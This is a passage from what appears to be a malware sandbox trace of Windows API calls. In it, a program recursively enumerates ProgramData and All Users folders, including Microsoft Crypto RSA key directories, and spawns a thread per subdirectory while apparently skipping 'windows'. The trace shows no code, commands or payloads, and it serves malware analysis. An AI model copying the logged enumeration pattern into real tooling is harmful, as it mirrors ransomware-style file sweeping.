lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*" [0049.010] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned 47 [0049.010] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-18" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0049.010] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0049.010] GlobalMemoryStatus (in: lpBuffer=0x2420fd10 | out: lpBuffer=0x2420fd10) [0049.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11681940, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x428 [0049.017] CloseHandle (hObject=0x428) returned 1 [0049.017] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x2420fd30 | out: lpFindFileData=0x2420fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 0 [0049.017] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 534 os_tid = 0xc9c [0047.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x2434fd30 | out: lpFindFileData=0x2434fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db678 [0047.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.491] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x2434fd30 | out: lpFindFileData=0x2434fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.491] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.491] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x2434fd30 | out: lpFindFileData=0x2434fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0047.491] FindClose (in: hFindFile=0x5db678 | out: hFindFile=0x5db678) returned 1 Thread: id = 535 os_tid = 0xca0 [0047.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*.*", lpFindFileData=0x2448fd30 | out: lpFindFileData=0x2448fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db678 [0047.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.491] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x2448fd30 | out: lpFindFileData=0x2448fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.491] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.492] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.492] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x2448fd30 | out: lpFindFileData=0x2448fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0047.492] FindClose (in: hFindFile=0x5db678 | out: hFindFile=0x5db678) returned 1 Thread: id = 536 os_tid = 0xca4 [0047.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*", lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db678 [0047.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.492] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.492] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.492] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.492] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 1 [0047.493] lstrcmpW (lpString1=".", lpString2="ApplicationViewsRootNode") returned -1 [0047.493] lstrcmpW (lpString1="..", lpString2="ApplicationViewsRootNode") returned -1 [0047.493] lstrcmpiW (lpString1="windows", lpString2="ApplicationViewsRootNode") returned 1 [0049.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*" [0049.023] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*") returned 55 [0049.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", lpString2="ApplicationViewsRootNode" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0049.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*" [0049.023] GlobalMemoryStatus (in: lpBuffer=0x132dfd10 | out: lpBuffer=0x132dfd10) [0049.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f573e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0049.030] CloseHandle (hObject=0x540) returned 1 [0049.030] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 0 [0049.030] FindClose (in: hFindFile=0x5db678 | out: hFindFile=0x5db678) returned 1 Thread: id = 537 os_tid = 0xca8 [0047.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*.*", lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db6b8 [0047.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.493] FindNextFileW (in: hFindFile=0x5db6b8, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.493] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.493] FindNextFileW (in: hFindFile=0x5db6b8, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0047.493] FindClose (in: hFindFile=0x5db6b8 | out: hFindFile=0x5db6b8) returned 1 Thread: id = 538 os_tid = 0xcac [0047.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*", lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db6b8 [0047.494] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.494] FindNextFileW (in: hFindFile=0x5db6b8, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.494] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.494] FindNextFileW (in: hFindFile=0x5db6b8, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0047.494] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0047.494] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0047.494] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0049.035] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*" [0049.035] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*") returned 54 [0049.035] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0049.035] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*" [0049.035] GlobalMemoryStatus (in: lpBuffer=0x92cfd10 | out: lpBuffer=0x92cfd10) [0049.035] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c0e5f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0049.039] CloseHandle (hObject=0x360) returned 1 [0049.040] FindNextFileW (in: hFindFile=0x5db6b8, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0049.040] FindClose (in: hFindFile=0x5db6b8 | out: hFindFile=0x5db6b8) returned 1 Thread: id = 539 os_tid = 0xcb0 [0047.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*", lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db3b8 [0047.495] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.495] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.495] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.495] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0047.495] lstrcmpW (lpString1=".", lpString2="Patch") returned -1 [0047.495] lstrcmpW (lpString1="..", lpString2="Patch") returned -1 [0047.495] lstrcmpiW (lpString1="windows", lpString2="Patch") returned 1 [0049.038] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*" [0049.038] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*") returned 90 [0049.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\", lpString2="Patch" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0049.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*" [0049.038] GlobalMemoryStatus (in: lpBuffer=0x160dfd10 | out: lpBuffer=0x160dfd10) [0049.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f30ee8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0049.044] CloseHandle (hObject=0x540) returned 1 [0049.045] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0049.045] FindClose (in: hFindFile=0x5db3b8 | out: hFindFile=0x5db3b8) returned 1 Thread: id = 540 os_tid = 0xcb4 [0047.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*", lpFindFileData=0x161dfd30 | out: lpFindFileData=0x161dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6710f0 [0047.495] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.495] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x161dfd30 | out: lpFindFileData=0x161dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.495] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.496] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x161dfd30 | out: lpFindFileData=0x161dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0047.496] lstrcmpW (lpString1=".", lpString2="Patch") returned -1 [0047.496] lstrcmpW (lpString1="..", lpString2="Patch") returned -1 [0047.496] lstrcmpiW (lpString1="windows", lpString2="Patch") returned 1 [0049.044] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*" [0049.044] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*") returned 90 [0049.044] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\", lpString2="Patch" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0049.044] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*" [0049.044] GlobalMemoryStatus (in: lpBuffer=0x161dfd10 | out: lpBuffer=0x161dfd10) [0049.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a9dfd8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0049.053] CloseHandle (hObject=0x628) returned 1 [0049.053] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x161dfd30 | out: lpFindFileData=0x161dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0049.053] FindClose (in: hFindFile=0x6710f0 | out: hFindFile=0x6710f0) returned 1 Thread: id = 541 os_tid = 0xcb8 [0047.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6710b0 [0047.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.496] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, 